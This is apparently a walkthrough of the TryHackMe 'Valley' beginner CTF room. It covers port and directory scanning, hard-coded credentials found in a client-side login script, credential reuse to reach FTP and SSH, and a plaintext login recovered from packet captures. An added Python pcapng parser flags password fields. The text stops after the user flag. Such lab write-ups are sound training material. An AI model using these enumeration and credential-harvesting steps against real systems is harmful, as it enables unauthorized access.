Walkthrough: Valley CTF - TryHackMe.
Beginner level ctf.
Can you find your way into the Valley?
Answer the questions below
- What is the user flag?
- What is the root flag?
Since we don't care about being noticed, we run rustscan, which is faster than nmap.
┌──(kali㉿kali)-[~/Documents]
└─$ rustscan -a 10.10.91.79
Results:
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack
80/tcp    open  http    syn-ack
37370/tcp open  unknown syn-ack
Port 22 (SSH) doesn't allow anonymous login, so we move on.
We access the site via web browser.
index.html
pricing.html
gallery.html
Not much to see in the source code, and nothing relevant in styles.css either.
We run gobuster on port 80 in case we missed anything:
┌──(kali㉿kali)-[~/Documents]
└─$ gobuster dir --url http://10.10.91.79:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Results:
/gallery (Status: 301) [Size: 312] [--> http://10.10.91.79/gallery/]
/static  (Status: 301) [Size: 311] [--> http://10.10.91.79/static/]
/pricing (Status: 301) [Size: 312] [--> http://10.10.91.79/pricing/]
/static --> we can't see any file there.
/pricing --> a note.txt file and the html file.
note.txt: J, Please stop leaving notes randomly on the website -RP
/gallery --> just the html file.
We dig deeper in the found directories.
┌──(kali㉿kali)-[~/Documents]
└─$ gobuster dir --url http://10.10.91.79:80/static -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Results:
Starting gobuster in directory enumeration mode
/11 (Status: 200) [Size: 627909]
/12 (Status: 200) [Size: 2203486]
/3  (Status: 200) [Size: 421858]
/10 (Status: 200) [Size: 2275927]
/13 (Status: 200) [Size: 3673497]
/16 (Status: 200) [Size: 2468462]
/6  (Status: 200) [Size: 2115495]
/18 (Status: 200) [Size: 2036137]
/1  (Status: 200) [Size: 2473315]
/9  (Status: 200) [Size: 1190575]
/5  (Status: 200) [Size: 1426557]
/14 (Status: 200) [Size: 3838999]
/17 (Status: 200) [Size: 3551807]
/7  (Status: 200) [Size: 5217844]
/8  (Status: 200) [Size: 7919631]
/15 (Status: 200) [Size: 3477315]
/00 (Status: 200) [Size: 127]
/00 seems to be an outlier (127 bytes, while everything else is an image-sized file). In there we find some notes:
dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts
We check if /dev1243224123123 is still up.
It is. There's a login page. In the page source we find two .js files, and one of them includes the login check below, which is done entirely client-side with the username and password hard-coded in the script (so anyone who reads the file gets both the credentials and the hidden path):
loginButton.addEventListener("click", (e) => {
    e.preventDefault();
    const username = loginForm.username.value;
    const password = loginForm.password.value;
    if (username === "siemDev" && password === "california") {
        window.location.href = "/dev1243224123123/devNotes37370.txt";
    } else {
        loginErrorMsg.style.opacity = 1;
    }
});
Going to /dev1243224123123/devNotes37370.txt we get more notes:
dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port
Since the note mentions the FTP port, we check the unusual TCP port (37370) that rustscan found, and test whether the dev reused the siemDev credentials from the login script. They did, so we can log in.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.91.79 -P 37370
There we find some pcapng files.
Results:
-rw-rw-r-- 1 1000 1000    7272 Mar 06 2023 siemFTP.pcapng
-rw-rw-r-- 1 1000 1000 1978716 Mar 06 2023 siemHTTP1.pcapng
-rw-rw-r-- 1 1000 1000 1972448 Mar 06 2023 siemHTTP2.pcapng
We open them with Wireshark:
In siemFTP.pcapng we find an FTP directory listing that reveals the existence of some files which may or may not be relevant: Line-based text data (6 lines)
-rw-r--r-- 1 0 0 0 Mar 06 13:27 AnnualReport.txt\r\n
-rw-r--r-- 1 0 0 0 Mar 06 13:27 BusinessReport.t
-rw-r--r-- 1 0 0 0 Mar 06 13:27 CISOReport.txt\r\n
-rw-r--r-- 1 0 0 0 Mar 06 13:27 HrReport.txt\r\n
-rw-r--r-- 1 0 0 0 Mar 06 13:27 ItReport.txt\r\n
-rw-r--r-- 1 0 0 0 Mar 06 13:27 SecurityReport.txt\r\n
In siemHTTP1.pcapng we find nothing useful: everything is encrypted.
In siemHTTP2.pcapng we find a packet with the following information (a login form submitted over plain HTTP, so the credentials are readable in the capture):
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "uname" = "valleyDev"
Form item: "psw" = "ph0t0s1234"
Form item: "remember" = "on"
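To show how a credential like this ends up readable in a capture, here is an added Python example (not from the room or the walkthrough's author) that walks a pcapng file, extracts url-encoded POST bodies from plain-HTTP packets and flags password-like fields, which is the check a SOC would run over such captures. The capture it parses is constructed inline; the POST path and the password value are placeholders.

```python
import struct
from urllib.parse import parse_qs

def epb_packets(data):  # yield the captured bytes of every pcapng Enhanced Packet Block (type 6)
    off = 0
    while off + 8 <= len(data):
        btype, blen = struct.unpack_from("<II", data, off)
        if blen < 12 or off + blen > len(data):
            break  # truncated or corrupt block: stop rather than mis-parse
        if btype == 6:
            caplen = struct.unpack_from("<I", data, off + 20)[0]  # header is 28 bytes, caplen at +20
            yield data[off + 28:off + 28 + caplen]
        off += blen

def tcp_payload(pkt):  # Ethernet -> IPv4 -> TCP; returns payload bytes, or None if not IPv4/TCP
    if len(pkt) < 54 or pkt[12:14] != b"\x08\x00" or pkt[23] != 6:
        return None
    tcp = 14 + (pkt[14] & 0x0F) * 4          # IHL gives the IPv4 header length
    return pkt[tcp + (pkt[tcp + 12] >> 4) * 4:]  # TCP data offset gives the header length

def find_form_credentials(pcapng, secret_keys=("psw", "password", "pass")):
    """Return every url-encoded POST body in the capture that carries a password-like field."""
    hits = []
    for pkt in epb_packets(pcapng):
        payload = tcp_payload(pkt)
        if not payload or not payload.startswith(b"POST "):
            continue
        head, _, body = payload.partition(b"\r\n\r\n")
        if b"application/x-www-form-urlencoded" not in head:
            continue
        fields = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
        if any(k in fields for k in secret_keys):
            hits.append(fields)
    return hits

# --- constructed sample capture (not from the room): one login POST over plain HTTP ---
BODY = b"uname=valleyDev&psw=example-pass&remember=on"       # password value is a placeholder
HTTP_POST = (b"POST /login HTTP/1.1\r\nHost: 10.10.91.79\r\nContent-Type: application/x-www-form-urlencoded\r\n"
             b"Content-Length: %d\r\n\r\n" % len(BODY)) + BODY
IP = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(HTTP_POST), 1, 0, 64, 6, 0,
                 bytes([10, 10, 91, 1]), bytes([10, 10, 91, 79]))          # proto 6 = TCP, checksum left 0
TCP = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 0x50, 0x18, 65535, 0, 0)  # data offset 5 words, PSH|ACK
FRAME = b"\x00" * 12 + b"\x08\x00" + IP + TCP + HTTP_POST               # Ethernet header, ethertype IPv4
PAD = (-len(FRAME)) % 4
SHB = struct.pack("<IIIHHqI", 0x0A0D0D0A, 28, 0x1A2B3C4D, 1, 0, -1, 28)   # Section Header Block
IDB = struct.pack("<IIHHII", 1, 20, 1, 0, 65535, 20)                      # Interface Description, linktype 1 = Ethernet
EPB = (struct.pack("<IIIIIII", 6, 32 + len(FRAME) + PAD, 0, 0, 0, len(FRAME), len(FRAME))
       + FRAME + b"\x00" * PAD + struct.pack("<I", 32 + len(FRAME) + PAD))
SAMPLE_PCAPNG = SHB + IDB + EPB
```

Running `find_form_credentials(open("siemHTTP2.pcapng", "rb").read())` on a real capture works the same way; the parser ignores non-IPv4/TCP frames and stops cleanly on a truncated file.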
The same credentials are reused for SSH, so we can use them to log in:
┌──(kali㉿kali)
└─$ ssh valleyDev@10.10.91.79
As soon as we log in we find a user.txt file containing the first flag.
Next flag to be continued…